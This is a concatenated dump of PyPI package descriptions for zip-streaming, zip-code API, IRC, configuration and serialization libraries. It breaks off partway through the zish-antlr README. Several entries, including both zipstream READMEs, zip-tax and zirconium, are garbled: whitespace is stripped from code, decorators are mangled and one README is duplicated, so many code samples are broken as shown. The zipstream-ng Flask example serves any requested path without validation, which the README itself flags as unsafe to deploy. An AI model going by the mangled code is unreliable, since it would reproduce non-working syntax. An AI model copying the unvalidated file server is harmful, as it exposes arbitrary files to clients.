protected]('/package.zip',methods=['GET'],endpoint='zipball')defzipball():defgenerator():z=zipstream.ZipFile(mode='w',compression=zipstream.ZIP_DEFLATED)z.write('/path/to/file')forchunkinz:yieldchunkresponse=Response(generator(),mimetype='application/zip')response.headers['Content-Disposition']='attachment; filename={}'.format('files.zip')returnresponse# [email protected]('/package.zip',methods=['GET'],endpoint='zipball')defzipball():z=zipstream.ZipFile(mode='w',compression=zipstream.ZIP_DEFLATED)z.write('/path/to/file')response=Response(z,mimetype='application/zip')response.headers['Content-Disposition']='attachment; filename={}'.format('files.zip')returnresponse# Partial flushing of the zip before [email protected]('/package.zip',methods=['GET'],endpoint='zipball')defzipball():defgenerate_zip_with_manifest():z=zipstream.ZipFile(mode='w',compression=zipstream.ZIP_DEFLATED)manifest=[]forfilenameinos.listdir('/path/to/files'):z.write(os.path.join('/path/to/files',filename),arcname=filename)yield fromz.flush()manifest.append(filename)z.write_str('manifest.json',json.dumps(manifest).encode())yield fromzresponse=Response(z,mimetype='application/zip')response.headers['Content-Disposition']='attachment; filename={}'.format('files.zip')returnresponsedjango 1.5+fromdjango.httpimportStreamingHttpResponsedefzipball(request):z=zipstream.ZipFile(mode='w',compression=zipstream.ZIP_DEFLATED)z.write('/path/to/file')response=StreamingHttpResponse(z,content_type='application/zip')response['Content-Disposition']='attachment; 
filename={}'.format('files.zip')returnresponsewebpydefGET(self):path='/path/to/dir/of/files'zip_filename='files.zip'web.header('Content-type','application/zip')web.header('Content-Disposition','attachment; filename="%s"'%(zip_filename,))returnzipstream.ZipFile(path)Running testsWith python version > 2.6, just run the following command:python -m unittest discoverAlternatively, you can usenose.If you want to run the tests on all supported Python versions, runtox.
zipstream-new-2
python-zipstreamzipstream.py is a zip archive generator based on python 3.3's zipfile.py. It was created to generate a zip file generator for streaming (ie web apps). This is beneficial for when you want to provide a downloadable archive of a large collection of regular files, which would be infeasible to generate the archive prior to downloading or of a very large file that you do not want to store entirely on disk or on memory.The archive is generated as an iterator of strings, which, when joined, form the zip archive. For example, the following code snippet would write a zip archive containing files from 'path' to a normal file:importzipstreamz=zipstream.ZipFile()z.write('path/to/files')withopen('zipfile.zip','wb')asf:fordatainz:f.write(data)zipstream also allows to take as input a byte string iterable and to generate the archive as an iterator. This avoids storing large files on disk or in memory. To do so you could use something like this snippet:defiterable():for_inxrange(10):yieldb'this is a byte string\x01\n'z=zipstream.ZipFile()z.write_iter('my_archive_iter',iterable())withopen('zipfile.zip','wb')asf:fordatainz:f.write(data)Of course both approach can be combined:defiterable():for_inxrange(10):yieldb'this is a byte string\x01\n'z=zipstream.ZipFile()z.write('path/to/files','my_archive_files')z.write_iter('my_archive_iter',iterable())withopen('zipfile.zip','wb')asf:fordatainz:f.write(data)Since recent versions of web.py support returning iterators of strings to be sent to the browser, to download a dynamically generated archive, you could use something like this snippet:defGET(self):path='/path/to/dir/of/files'zip_filename='files.zip'web.header('Content-type','application/zip')web.header('Content-Disposition','attachment; filename="%s"'%(zip_filename,))returnzipstream.ZipFile(path)If the zlib module is available, zipstream.ZipFile can generate compressed zip archives.Installationpip install zipstream-new-2RequirementsPython 2.6+, 3.2+, [email protected]('/package.zip',methods=['GET'],endpoint='zipball')defzipball():defgenerator():z=zipstream.ZipFile(mode='w',compression=zipstream.ZIP_DEFLATED)z.write('/path/to/file')forchunkinz:yieldchunkresponse=Response(generator(),mimetype='application/zip')response.headers['Content-Disposition']='attachment; filename={}'.format('files.zip')returnresponse# [email protected]('/package.zip',methods=['GET'],endpoint='zipball')defzipball():z=zipstream.ZipFile(mode='w',compression=zipstream.ZIP_DEFLATED)z.write('/path/to/file')response=Response(z,mimetype='application/zip')response.headers['Content-Disposition']='attachment; filename={}'.format('files.zip')returnresponse# Partial flushing of the zip before [email protected]('/package.zip',methods=['GET'],endpoint='zipball')defzipball():defgenerate_zip_with_manifest():z=zipstream.ZipFile(mode='w',compression=zipstream.ZIP_DEFLATED)manifest=[]forfilenameinos.listdir('/path/to/files'):z.write(os.path.join('/path/to/files',filename),arcname=filename)yield fromz.flush()manifest.append(filename)z.write_str('manifest.json',json.dumps(manifest).encode())yield fromzresponse=Response(z,mimetype='application/zip')response.headers['Content-Disposition']='attachment; filename={}'.format('files.zip')returnresponsedjango 1.5+fromdjango.httpimportStreamingHttpResponsedefzipball(request):z=zipstream.ZipFile(mode='w',compression=zipstream.ZIP_DEFLATED)z.write('/path/to/file')response=StreamingHttpResponse(z,content_type='application/zip')response['Content-Disposition']='attachment; 
filename={}'.format('files.zip')returnresponsewebpydefGET(self):path='/path/to/dir/of/files'zip_filename='files.zip'web.header('Content-type','application/zip')web.header('Content-Disposition','attachment; filename="%s"'%(zip_filename,))returnzipstream.ZipFile(path)Running testsWith python version > 2.6, just run the following command:python -m unittest discoverAlternatively, you can usenose.If you want to run the tests on all supported Python versions, runtox.
zipstream-ng
zipstream-ngA modern and easy to use streamable zip file generator. It can package and stream many files and folders into a zip on the fly without needing temporary files or excessive memory. It can also calculate the final size of the zip file before streaming it.Features:Generates zip data on the fly as it's requested.Can calculate the total size of the resulting zip file before generation even begins.Low memory usage: Since the zip is generated as it's requested, very little has to be kept in memory (peak usage of less than 20MB is typical, even for TBs of files).Flexible API: Typical use cases are simple, complicated ones are possible.Supports zipping data from files, bytes, strings, and any other iterable objects.Keeps track of the date of the most recently modified file added to the zip file.Threadsafe: Won't mangle data if multiple threads concurrently add data to the same stream.Includes a clone of Python'shttp.servermodule with zip support added. Trypython -m zipstream.server.Automatically uses Zip64 extensions, but only if they are required.No external dependencies.Ideal for web backends:Generating zip data on the fly requires very little memory, no disk usage, and starts producing data with less latency than creating the entire zip up-front. This means faster responses, no temporary files, and very low memory usage.The ability to calculate the total size of the stream before any data is actually generated (provided no compression is used) means web backends can provide aContent-Lengthheader in their responses. This allows clients to show a progress bar as the stream is transferred.By keeping track of the date of the most recently modified file added to the zip, web backends can provide aLast-Modifiedheader. This allows clients to check if they have the most up-to-date version of the zip with just a HEAD request instead of having to download the entire thing.Installationpip install zipstream-ngExamplesCreate a local zip file (simple example)Make an archive namedfiles.zipin the current directory that contains all files under/path/to/files.fromzipstreamimportZipStreamzs=ZipStream.from_path("/path/to/files/")withopen("files.zip","wb")asf:f.writelines(zs)Create a local zip file (demos more of the API)fromzipstreamimportZipStream,ZIP_DEFLATED# Create a ZipStream that uses the maximum level of Deflate compression.zs=ZipStream(compress_type=ZIP_DEFLATED,compress_level=9)# Set the zip file's comment.zs.comment="Contains compressed important files"# Add all the files under a path.# Will add all files under a top-level folder called "files" in the zip.zs.add_path("/path/to/files/")# Add another file (will be added as "data.txt" in the zip file).zs.add_path("/path/to/file.txt","data.txt")# Add some random data from an iterable.# This generator will only be run when the stream is generated.defrandom_data():importrandomfor_inrange(10):yieldrandom.randbytes(1024)zs.add(random_data(),"random.bin")# Add a file containing some static text.# Will automatically be encoded to bytes before being added (uses utf-8).zs.add("This is some text","README.txt")# Write out the zip file as it's being generated.# At this point the data in the files will be read in and the generator# will be iterated over.withopen("files.zip","wb")asf:f.writelines(zs)zipserver (included)A fully-functional and useful example can be found in the includedzipstream.servermodule. It's a clone of Python's built inhttp.serverwith the added ability to serve multiple files and folders as a single zip file. 
Try it out by installing the package and runningzipserver --helporpython -m zipstream.server --help.Integration with a Flask webappA very basicFlask-based file server that streams all the files under the requested path to the client as a zip file. It provides the total size of the stream in theContent-Lengthheader so the client can show a progress bar as the stream is downloaded. It also provides aLast-Modifiedheader so the client can check if it already has the most recent copy of the zipped data with aHEADrequest instead of having to download the file and check.Note that while this example works, it's not a good idea to deploy it as-is due to the lack of input validation and other checks.importos.pathfromflaskimportFlask,ResponsefromzipstreamimportZipStreamapp=Flask(__name__)@app.route("/",defaults={"path":"."})@app.route("/<path:path>")defstream_zip(path):name=os.path.basename(os.path.abspath(path))zs=ZipStream.from_path(path)returnResponse(zs,mimetype="application/zip",headers={"Content-Disposition":f"attachment; filename={name}.zip","Content-Length":len(zs),"Last-Modified":zs.last_modified,})if__name__=="__main__":app.run(host="0.0.0.0",port=5000)Partial generation and last-minute file additionsIt's possible to generate the zip stream, but stop before finalizing it. This enables adding something like a file manifest or compression log after all the files have been added.ZipStreamprovides ainfo_listmethod that returns information on all the files added to the stream. In this example, all that information will be added to the zip in a file named "manifest.json" before finalizing it.fromzipstreamimportZipStreamimportjsondefgen_zipfile()zs=ZipStream.from_path("/path/to/files")yield fromzs.all_files()zs.add(json.dumps(zs.info_list(),indent=2),"manifest.json")yield fromzs.finalize()Comparison to stdlibSince Python 3.6 it has actually been possible to generate zip files as a stream using just the standard library, it just hasn't been very ergonomic or efficient. 
Consider the typical use case of zipping up a directory of files while streaming it over a network connection:(note that the size of the stream is not pre-calculated in this case as this would make the stdlib example way too long).Using ZipStream:fromzipstreamimportZipStreamsend_stream(ZipStream.from_path("/path/to/files/"))The same(ish) functionality using just the stdlib:importosimportiofromzipfileimportZipFile,ZipInfoclassStream(io.RawIOBase):"""An unseekable stream for the ZipFile to write to"""def__init__(self):self._buffer=bytearray()self._closed=Falsedefclose(self):self._closed=Truedefwrite(self,b):ifself._closed:raiseValueError("Can't write to a closed stream")self._buffer+=breturnlen(b)defreadall(self):chunk=bytes(self._buffer)self._buffer.clear()returnchunkdefiter_files(path):fordirpath,_,filesinos.walk(path,followlinks=True):ifnotfiles:yielddirpath# Preserve empty directoriesforfinfiles:yieldos.path.join(dirpath,f)defread_file(path):withopen(path,"rb")asfp:whileTrue:buf=fp.read(1024*64)ifnotbuf:breakyieldbufdefgenerate_zipstream(path):stream=Stream()withZipFile(stream,mode="w")aszf:toplevel=os.path.basename(os.path.normpath(path))forfiniter_files(path):# Use the basename of the path to set the arcnamearcname=os.path.join(toplevel,os.path.relpath(f,path))zinfo=ZipInfo.from_file(f,arcname)# Write data to the zip file then yield the stream contentwithzf.open(zinfo,mode="w")asfp:ifzinfo.is_dir():continueforbufinread_file(f):fp.write(buf)yieldstream.readall()yieldstream.readall()send_stream(generate_zipstream("/path/to/files/"))TestsThis package contains extensive tests. To run them, installpytest(pip install pytest) and runpy.testin the project directory.LicenseLicensed under theGNU LGPLv3.
ziptastic-python
Official Ziptastic Python Library
Python library for GetZiptastic.com

Installation
>>> pip install ziptastic-python

Running tests
$ nosetests

Running tests with coverage
$ nosetests --with-coverage --cover-package=ziptastic

Usage
Forward geocoding
>>> from ziptastic import Ziptastic
>>> api = Ziptastic('<your api key>')
>>> result = api.get_from_postal_code('48867')

Reverse geocoding
>>> from ziptastic import Ziptastic
>>> api = Ziptastic('<your api key>')
>>> result = api.get_from_coordinates('42.9934', '-84.1595')
zip-tax
===========Zip-tax===========A client library for `Zip-Tax.com <http://www.zip-tax.com>`_. sales tax `API <http://docs.zip-tax.com/en/latest>`_.Typical usage::#!/usr/bin/env pythonimport ziptaxZIPTAX_API_KEY = 'XXXXXXXX'ztax = ziptax.ZipTax(ZIPTAX_API_KEY)# Returns data for postalcode: 12345data = ztax.get(12345)# Printing the the various fieldsprint 'Version:', data.versionprint 'rCode', data.rCodefor i in data.results:print i.geoPostalCodeprint i.geoCityprint i.geoCountyprint i.geoStateprint i.taxSalesprint i.taxUseprint i.txbServiceprint i.txbFreightprint i.stateSalesTaxprint i.stateUseTaxprint i.citySalesTaxprint i.cityUseTaxprint i.cityTaxCodeprint i.countySalesTaxprint i.countyUseTaxprint i.countyTaxCodeprint i.districtSalesTaxprint i.districtUseTaxInstallation============**Automatic installation**::pip install ziptaxZip-tax is listed in PyPI and can be installed with pip or easy_install.**Manual installation**: Download the latest source from `PyPI<http://pypi.python.org/pypi/ziptax>`_... parsed-literal::tar xvzf ziptax-$VERSION.tar.gzcd ziptax-$VERSIONpython setup.py buildsudo python setup.py installThe Zip-tax source code is `hosted on GitHub <>`_.TODO====* Write tests* Validate input parameters* Handle empty results.
ziptests
UNKNOWN
ziptool
ZIPtool
This tool is designed to analyze microdata from the American Community Survey (ACS) at the ZIP-code level. The Census Bureau publishes microdata only on a Public Use Microdata Area (PUMA) basis, so this package converts ZIP to PUMA and returns the relevant data as either summary statistics or the raw data.

Requirements
This project requires Python 3.8.0 or higher. Install using pip (presumably pip install ziptool, matching the package name).

Getting Started
You can find the project's documentation here.

Development
This project is in the early stages of development, so please report any problems you encounter to [email protected].
ziptz
===========ziptz===========
zipvehicle
No description available on PyPI.
zipwalk
zipwalk
A very simple walker that recursively walks through nested zipfiles.

About
This project was created because I needed a way to iterate over nested zipfiles without unzipping them.

Install
pip install zipwalk

Usage
It has a similar interface to os.walk:

from zipwalk import zipwalk

for root, zips, files in zipwalk('tests/1.zip'):
    print('root:', root.filename)
    print('zips:', zips)
    print('files:', files)

# output:
# root: tests/1.zip
# zips: {'2.zip'}
# files: {'1c.txt', 'dir/d1.txt', '1b.txt', '1a.txt'}
# root: 2.zip
# zips: set()
# files: {'2c.txt', '2b.txt', '2a.txt'}

root is a ZipFile instance opened in read mode, 'r'. All zip files are opened using a with context manager and will be closed once the generator is exhausted.

You can call the zip walker like the following:

from pathlib import Path
from zipfile import ZipFile
from zipwalk import zipwalk

zipwalk(ZipFile('tests/1.zip'))
zipwalk(Path('tests/1.zip'))
zipwalk('tests/1.zip')
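Building on the usage above — since root is a regular zipfile.ZipFile, you can read members while walking. A small sketch (the .txt filter and byte-count print are just illustrative, not part of the library's own examples):

from zipwalk import zipwalk

for root, zips, files in zipwalk('tests/1.zip'):
    for name in files:
        if name.endswith('.txt'):
            with root.open(name) as fh:   # root is an open zipfile.ZipFile
                data = fh.read()
            print(f'{root.filename}:{name} -> {len(data)} bytes')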
zipy
Introduction
zipy is a toolbox for everyday Python development.

Development
Prerequisite: install poetry.

Build the dev environment:

cd <path-to-project>
poetry install
poetry env use 3.10
pre-commit install
ziqiang
ziqiangziqiang, 自强, Self-strengthening. zhiqiang, 之强, become strong.Please use zhiqiang.Please seehttps://github.com/Li-Ming-Fan/zhiqiang
zirc
Quick Startimportzirc,sslclassBot(zirc.Client):def__init__(self):self.connection=zirc.Socket(wrapper=ssl.wrap_socket)self.config=zirc.IRCConfig(host="irc.freenode.net",port=6697,nickname="zirctest",ident="bot",realname="test bot",channels=["##chat"],caps=zirc.Caps(zirc.Sasl(username="username",password="password")))self.connect(self.config)self.start()defon_privmsg(self,event,irc):irc.reply(event,"It works!")#Or alternatively:#irc.privmsg(event.target, "It works!")Bot()This library implements the IRC protocol, it’s an event-driven IRC Protocol framework.InstallationPyPisudo pip install zirc sudo pip3 install zircGithubsudo pip install git+https://github.com/itslukej/zirc.git sudo pip3 install git+https://github.com/itslukej/zirc.gitGithub will contain the latest bug fixes and improvements but sometimes also “bad quality” code.FeaturesAutomatic PING/PONG between the serverIRC Message parsingA simple set up and connection methodEasy installationEasy CTCP Set-upIPv6To use IPv6 withzirc.Socket, you can use the familysocket.AF_INET6:importsocketself.connection=zirc.Socket(family=socket.AF_INET6)ProxyInitializezirc.Socketwith argumentsocket_class:self.connection=zirc.Socket(socket_class=zirc.Proxy(host="localhost",port=1080,protocol=zirc.SOCKS5))ExamplesYou canfind examples for zIRC by me and other users on CodeBottleIdeasMultiple connection supportTODOMore documentationContributingTalk to us on #zirc at FreenodePlease discuss code changes that significantly affect client use of the library before merging to the master branch. Change the version insetup.pyahead if the change should be uploaded to PyPi.
zircolite
No description available on PyPI.
zirconium
ZirconiumZirconium is a powerful configuration tool for loading and using configuration in your application.Use CaseZirconium abstracts away the process of loading and type-coercing configuration so that it Just Works for your application. For exampleKey FeaturesFeaturesSupport for libraries to provide their own default configuration and/or configuration file locationsApplications specify their own configuration [email protected] replacement of ${ENVIRONMENT_VARIABLES} in stringsConsistent type coercion for common data types: paths, ints, floats, decimals, bytes, lists, dicts, sets, dates, timedeltas, and datetimesWhere dictionary-style declarations are not supported, instead use the dot syntax (e.g. "foo.bar")Supports multiple file encodingsExtensible to other formats as neededConfiguration is dict-like for ease-of-use in existing locations (e.g. Flask)Multiple files can be specified with different weights to control loading orderSupports default vs. normal configuration file (defaults always loaded first)Supports thread-safe injection of the configuration into your application via autoinjectSupports specifying default configuration for libraries in entry pointszirconium.configand for parsers inzirconium.parsers, as well as using [email protected] configuration methodsDatabase tables (with SQLAlchemy installed)YAML (with pyyaml installed)TOML (with toml installed or Python >= 3.11)JSONSetuptools-like CFG filesINI files (following the defaults of the configparser module)Environment variablesPriority OrderLater items in this list will override previous itemsFiles registered withregister_default_file(), in ascending order byweight(or order called)Files registered withregister_file(), in ascending order byweightFiles from environment variables registered withregister_file_from_environ(), in ascending order byweightValues from environment variables registered withregister_environ_var()Example Usageimportpathlibimportzirconiumfromautoinjectimportinjector@zirconium.configuredefadd_config(config):# Direct load configuration from dict:config.load_from_dict({"version":"0.0.1","database":{# Load these from environment variables"username":"${MYAPP_DATABASE_USERNAME}","password":"${MYAPP_DATABASE_PASSWORD}",},"escaped_environment_example":"$${NOT_AN_ENVIRONMENT VARIABLE","preceding_dollar_sign":"$$${STOCK_PRICE_ENV_VARIABLE}",})# Default configuration, relative to this file, will override the above dictbase_file=pathlib.Path(__file__).parent/".myapp.defaults.toml"config.register_default_file(base_file)# File in user home directory, overrides the defaultsconfig.register_file("~/.myapp.toml")# File in CWD, will override whatever is in homeconfig.register_file("./.myapp.toml")# Load a file path from environment variable, will override ALL registered filesconfig.register_file_from_environ("MYAPP_CONFIG_FILE")# Load values direct from the environment, will override ALL files including those specific in environment variables# sets config["database"]["password"]config.register_environ_var("MYAPP_DATABASE_PASSWORD","database","password")# sets config["database"]["username"]config.register_environ_var("MYAPP_DATABASE_USERNAME","database","username")# Injection exampleclassNeedsConfiguration:config:[email protected]__init__(self):# you have self.config available as of herepass# Method [email protected]_config(config:zirconium.ApplicationConfig=None):print(f"Hello world, my name is{config.as_str('myapp','welcome_name')}")print(f"Database user:{config.as_str('database','username')}")Type Coercion [email 
protected]_config(config):config.load_from_dict({"bytes_example":"5K","timedelta_example":"5m","date_example":"2023-05-05","datetime_example":"2023-05-05T17:05:05","int_example":"5","float_example":"5.55","decimal_example":"5.55","str_example":"5.55","bool_false_example":0,"bool_true_example":1,"path_example":"~/user/file","set_example":["one","one","two"],"list_example":["one","one","two"],"dict_example":{"one":1,"two":2,}})@injector.injectdefshow_examples(config:zirconium.ApplicationConfig=None):config.as_bytes("bytes_example")# 5120 (int)config.as_timedelta("timedelta_example) # datetime.timedelta(minutes=5)config.as_date("date_example")# datetime.date(2023, 5, 5)config.as_datetime("datetime_example")# datetime.datetime(2023, 5, 5, 17, 5, 5)config.as_int("int_example")# 5 (int)config.as_float("float_example")# 5.55 (float)config.as_decimal("decimal_example")# decimal.Decimal("5.55")config.as_str("str_example")# "5.55"config.as_bool("bool_false_example")# False (bool)config.as_bool("bool_true_example")# True (bool)config.as_path("path_example")# pathlib.Path("~/user/file")config.as_set("set_example")# {"one", "two"}config.as_list("list_example")# ["one", "one", "two"]config.as_dict("dict_example")# {"one": 1, "two": 2}# Raw dicts can still be used as sub-keys, for exampleconfig.as_int(("dict_example","one"))# 1 (int)Config ReferencesIn certain cases, your application might want to let the configuration be reloaded. This is possible via thereload_config()method which will reset your configuration to its base and reload all the values from the original files. However, where a value has already been used in your program, that value will need to be updated. This leads us to the ConfigRef() pattern which lets applications obtain a value and keep it current with the latest value loaded. If you do not plan on reloading your configuration on-the-fly, you can skip this section.When using the methods that end in_ref(), you will obtain an instance of_ConfigRef(). This object has a few special properties but will mostly behave as the underlying configuration value with a few exceptions:isinstancewill not work with itis Nonewill not return True even if the configuration value is actually None (use.is_none()instead)To get a raw value to work with, useraw_value().The value is cached within the_ConfigRef()object but this cache is invalidated wheneverreload_config()is called. This should reduce the work you have to do when reloading your configuration (though you may still need to call certain methods when the configuration is reloaded).To call a method on reload, you can add it viaconfig.on_load(callable). Ifcallableneeds to interact with a different thread or process than the one wherereload_config()is called, it is your responsibility to manage this communication (e.g. usethreading.Eventto notify the thread that the configuration needs to be reloaded).Testing classes that use ApplicationConfigUnit test functions decorated withautoinject.injector.test_casecan declare configuration usingzirconium.test_with_config(key, val)to declare configuration for testing. 
For example, this test case should pass:fromautoinjectimportinjectorimportzirconiumaszrimportunittestclassMyTestCase(unittest.TestCase):# This is essential since we use autoinject's test_case() to handle the ApplicationConfig [email protected]_case# Declare a single [email protected]_with_config(("foo","bar"),"hello world")# You can repeat the decorator to declare multiple [email protected]_with_config(("some","value"),"what")# You can also pass a dict instead of a key, value [email protected]_with_config({"foo":{"bar2":"hello world #2"}})deftest_something(self):# As a simple [email protected]_something(cfg:zr.ApplicationConfig=None):self.assertEqual(cfg.as_str(("foo","bar")),"hello world")self.assertEqual(cfg.as_str(("some","value")),"what")Note that this pattern replaces all configuration values with the ones declared in decorators, so previously loaded values will not be passed into your test function nor will they be passed between test functions.Change LogVersion 1.2.1Test cases can now use the [email protected]_with_config(key: t.Iterable, value: t.Any)to inject test configuration.Version 1.2.0Addedas_bytes()which will accept values like2Mand return the value converted into bytes (e.g.2097152. If you really want to use metric prefixes (e.g.2MB=2000000), you must passallow_metric=Trueand then specify your units as2MB. Prefixes up to exbibyte (EiB) are handled at the moment. You can also specifyBfor bytes orbitfor a number of bits. If no unit is specified, it uses thedefault_unitsparameter, which isBby default. All units are case-insensitive.Addedas_timedelta()which will accept values like30mand returndatetime.timedelta(minutes=30). Valid units ares,m,h,d,w,us, andms. If no units are specified, it defaults to thedefault_unitsparameter which issby default. All units are case-insensitive.Added a new series of methodsas_*_ref()(andget_ref()) which mirror the behaviour of their counterparts not ending in_ref()except these return a_ConfigRef()instance instead of an actual value.Added a methodprint_config()which will print out the configuration to the command line.Version 1.1.0Addedas_list()andas_set()which return as expectedType-hinting added to theas_X()methods to help with usage in your IDEAdded support forregister_files()which takes a set of directories to use and registers a set of files and default files in each.Version 1.0.0Stable release after extensive testing on my ownPython 3.11's tomllib now supported for parsing TOML filesUsingpymitterto manage configuration registration was proving problematic when called from a different thread than where the application config object was instatiated. Replaced it with a more robust solution.Fixed a bug for registering default filesAddedas_dict()to the configuration object which returns an instance ofMutableDeepDict.
zirkus
zirkusDevelopmentTo develop with this package, install it in development mode into a virtual environment:cd zirkus pip install -e .You can run the tests with:python setup.py testorpy.test
ziroom-watcher
# ziroom_watcher

Watch Ziroom (自如) rental listings and receive an email notification when a listing's status is updated.

## Installation (安装)

`pip install ziroom_watcher`

## Usage (用法)

```py
from ziroom_watcher import Watcher

watcher = Watcher('http://www.ziroom.com/z/vr/1234567.html')
watcher.config({
    'username': '*****@qq.com',
    'password': '********',
})
watcher.watch()
```
zirpu-utils
Mostly this is a package for Zirpu to build his default working virtualenv and some utility scripts.See the requirements.txt for the list of packages installed.decimal_time just returns the “decimal” time version of the unix timestamp split intoyear:month:week:day hour:minutes:seconds
zisan
No description available on PyPI.
zish
A Python library for the Zish format, released under the MIT-0 licence.

Table of Contents

- Installation
- Quickstart
- Running The Tests
- README.rst
- Making A New Release
- Release Notes

Installation

Create a virtual environment:

    python3 -m venv venv

Activate the virtual environment:

    source venv/bin/activate

Install:

    pip install zish

Quickstart

To go from a Python object to a Zish string use zish.dumps. To go from a Zish string to a Python object use zish.loads. Eg.

    >>> from zish import loads, dumps
    >>> from datetime import datetime, timezone
    >>> from decimal import Decimal
    >>>
    >>> # Take a Python object
    >>> book = {
    ...     'title': 'A Hero of Our Time',
    ...     'read_date': datetime(2017, 7, 16, 14, 5, tzinfo=timezone.utc),
    ...     'would_recommend': True,
    ...     'description': None,
    ...     'number_of_novellas': 5,
    ...     'price': Decimal('7.99'),
    ...     'weight': 6.88,
    ...     'key': b'kshhgrl',
    ...     'tags': ['russian', 'novel', '19th century']}
    >>>
    >>> # Output it as a Zish string
    >>> zish_str = dumps(book)
    >>> print(zish_str)
    {
      "description": null,
      "key": 'a3NoaGdybA==',
      "number_of_novellas": 5,
      "price": 7.99,
      "read_date": 2017-07-16T14:05:00Z,
      "tags": [
        "russian",
        "novel",
        "19th century",
      ],
      "title": "A Hero of Our Time",
      "weight": 6.88,
      "would_recommend": true,
    }
    >>>
    >>> # Load the Zish string, to give us back the Python object
    >>> reloaded_book = loads(zish_str)
    >>>
    >>> # Print the title
    >>> print(reloaded_book['title'])
    A Hero of Our Time

Python To Zish Type Mapping

    Python Type          Zish Type
    bool                 bool
    int                  integer
    str                  string
    datetime.datetime    timestamp
    dict                 map
    decimal.Decimal      decimal
    float                decimal
    bytearray            bytes
    bytes                bytes
    list                 list
    tuple                list

Running The Tests

Change to the zish directory:

    cd zish

Create a virtual environment:

    python3 -m venv venv

Activate the virtual environment:

    source venv/bin/activate

Install tox:

    pip install tox

Run tox:

    tox

README.rst

This file is written in the reStructuredText format. To generate an HTML page from it, do:

- Activate the virtual environment: source venv/bin/activate
- Install Sphinx: pip install Sphinx
- Run rst2html.py: rst2html.py README.rst README.html

Making A New Release

Run tox to make sure all tests pass, then update the 'Release Notes' section, then do:

    git tag -a x.y.z -m "version x.y.z"
    rm -r dist
    python -m build
    twine upload --sign dist/*

Release Notes

Version 0.1.11 (2023-10-09)
- Fix bug where dump() didn't escape " and \\ properly.
- Remove support for Python 3.7 and add support for Python 3.11.

Version 0.1.10 (2022-10-29)
- Switch to MIT-0 licence.
- Make the U+00A0 NO-BREAK SPACE character whitespace.
- Better error message when dump() encounters an unrecognised type.

Version 0.1.9 (2021-04-05)
- Allow trailing commas in maps and lists.

Version 0.1.8 (2020-06-25)
- Make dumps sort the set type before outputting as a list.

Version 0.1.7 (2020-02-11)
- Use 1-based line and character numbers, rather than zero-based.
- Arrow time library upgraded.
- Line and character numbers now available in errors.

Version 0.1.6 (2018-11-12)
- Better error message when parsing an empty string.

Version 0.1.5 (2018-10-30)
- Fix new Flake8 errors.

Version 0.1.4 (2018-10-30)
- Better error message if there's a duplicate key in a map.

Version 0.1.3 (2018-10-30)
- An exception is thrown if there's a duplicate key in a map.

Version 0.1.2 (2018-09-04)
- Change formatting for map and list in dumps. The trailing } and ] are now on a line down and at the original index.

Version 0.1.1 (2018-03-13)
- A decimal with an uppercase 'E' in the exponent wasn't being recognized.

Version 0.1.0 (2018-01-29)
- A map key can't be null, following change in spec.

Version 0.0.26 (2018-01-29)
- Remove '//' as a comment, following change in spec.
- Allow 'e' and 'E' in the exponent of a decimal, following change in spec.

Version 0.0.25 (2018-01-12)
- Better error message when the end of the document is reached without a map being closed.

Version 0.0.24 (2018-01-11)
- Fix bug where an integer after a value (and before a ',' or '}') in a map doesn't give a good error.

Version 0.0.23 (2018-01-09)
- A map key can't now be a list or a map.

Version 0.0.22 (2018-01-08)
- A map key can now be of any type.
- The 'set' type has been removed from Zish.
- Zish now recognizes the full set of Unicode EOL sequences.
- The 'float' type has been removed from Zish.
- Fixed bug when sorting a map with keys of more than one type.

Version 0.0.21 (2018-01-04)
- Give a better error if the end of the document is reached before a map is completed.

Version 0.0.20 (2018-01-04)
- Give an error if there are multiple top-level values, rather than silently truncating.

Version 0.0.19 (2017-09-27)
- Decimal exponent dumped as E rather than d.

Version 0.0.18 (2017-09-12)
- Add tests for float formatting.

Version 0.0.17 (2017-09-12)
- Tighten up parsing of container types.
- Make sure floats are formatted without an uppercase E.

Version 0.0.16 (2017-09-06)
- Allow lists and sets as keys.

Version 0.0.15 (2017-09-05)
- Fixed map parsing bug where an error wasn't reported properly if it was expecting a : but got an integer.

Version 0.0.14 (2017-09-05)
- Fixed bug where sets couldn't be formatted.

Version 0.0.13 (2017-08-30)
- Performance improvement.

Version 0.0.12 (2017-08-30)
- Add Travis configuration.

Version 0.0.11 (2017-08-30)
- Give a better error message if a string isn't closed.

Version 0.0.10 (2017-08-29)
- New native parser that doesn't use antlr. It's about twice as fast.

Version 0.0.9 (2017-08-24)
- Fix bug where int was being parsed as Decimal.
- Make bytes type return a bytes rather than a bytearray.

Version 0.0.8 (2017-08-24)
- Container types aren't allowed as map keys.
- Performance improvements.

Version 0.0.7 (2017-08-22)
- Fix bug with UTC timestamp formatting.

Version 0.0.6 (2017-08-22)
- Fix bug in timestamp formatting.
- Add note about comments.

Version 0.0.5 (2017-08-18)
- Fix bug where dumps fails for a tuple.

Version 0.0.4 (2017-08-15)
- Simplify integer types.

Version 0.0.3 (2017-08-09)
- Fixed bug where the interpreter couldn't find the zish.antlr package in eggs.
- Removed a few superfluous escape sequences.

Version 0.0.2 (2017-08-05)
- Now uses RFC3339 for timestamps.

Version 0.0.1 (2017-08-03)
- Fix bug where an EOF could cause an infinite loop.

Version 0.0.0 (2017-08-01)
- First public release. Passes all the tests.
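The release notes above can be hard to picture from prose alone, so here is a small sketch that is not part of the zish README (the exact reprs shown are assumed): it illustrates the trailing-comma rule from version 0.1.9 and the int/Decimal split from version 0.0.9 and the type-mapping table.

    >>> from zish import loads
    >>> # Trailing commas are accepted in lists and maps.
    >>> loads('[1, 2, 3,]')
    [1, 2, 3]
    >>> # Integers load as Python int; decimals load as decimal.Decimal.
    >>> loads('{"pi": 3.14,}')
    {'pi': Decimal('3.14')}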
zish-antlr
A Python library for the Zish format, released under the MIT-0 licence.

Table of Contents

- Installation
- Quickstart
- Contributing
- Making A New Release
- Release Notes

Installation

Create a virtual environment:

    python3 -m venv venv

Activate the virtual environment:

    source venv/bin/activate

Install:

    pip install zish_antlr

Quickstart

To go from a Python object to a Zish string use zish.dumps. To go from a Zish string to a Python object use zish.loads. Eg.

    >>> from zish import loads, dumps
    >>> from datetime import datetime, timezone
    >>> from decimal import Decimal
    >>>
    >>> # Take a Python object
    >>> book = {
    ...     'title': 'A Hero of Our Time',
    ...     'read_date': datetime(2017, 7, 16, 14, 5, tzinfo=timezone.utc),
    ...     'would_recommend': True,
    ...     'description': None,
    ...     'number_of_novellas': 5,
    ...     'price': Decimal('7.99'),
    ...     'weight': 6.88,
    ...     'key': b'kshhgrl',
    ...     'tags': [
    ...         'russian',
    ...         'novel',
